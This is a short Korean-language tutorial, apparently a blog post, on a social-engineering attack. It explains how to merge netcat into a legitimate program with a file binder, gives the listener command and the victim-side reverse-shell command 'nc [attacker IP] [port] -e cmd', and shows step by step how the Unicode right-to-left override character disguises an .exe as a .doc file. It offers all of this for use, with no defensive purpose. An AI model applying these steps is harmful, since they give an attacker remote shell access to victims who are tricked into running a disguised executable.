이 공격은 NetCat 리버스 커넥션에서 한단계 업그레이드된 방법으로써소셜해킹 , 인간관계적인 해킹을 사용하는 방법입니다. 정상적이고 실행하고싶거나 실행해야하는 프로그램에 공격자의 nc.exe를 병합하여 반강제적으로 NetCat 공격을 감행하는것입니다. 이 공격에 감염되었던 사례가 네이트온과 농협 해킹사건입니다. 이 과정에는 두가지 프로그램이 필요합니다. nc.exe( netcat 프로그램 ) 과 파일병합 프로그램 PowermergerNetCat UNIX/LINUX 용 : http://netcat.sourceforge.net/download.phpWindows 용 : http://www.securityfocus.com/tools/139Powermergerhttp://hsol.tistory.com/664 ..
1. 공격자PC - cmd - nc.exe 가 위치한 경로로 이동 - nc -lvp 임의의 port ex)nc -lvp 5555 - 리스닝 모드(대기상태) 돌입 2. 피해자 PC - CMD - nc.exe 가 위치한 경로로 이동 - nc 공격자IP port번호 -e cmd
1. 폴더 보기 옵션에서 '알려진 확장자명 숨기기' 체크 해제 2. 새로 만들기 logcod.exe 파일 생성( [파일명]cod.exe 면 된다. ) 3. 제어판 -> 국가 및 언어 옵션 -> "언어 탭" -> "자세히" -> 추가 -> 입력언어: 중국어(대만) / 자판배열: 중국어(번체-Unicode) 선택 후 확인 4. 작업표시줄 하단에 언어를 중국어(대만)로 선택 5. log 와 cod 사이에 202e 입력(유니코드) ex)log202ecod.exe 성공했다면 exe파일이지만 확장자가 doc로 바뀐것을 볼 수 있다.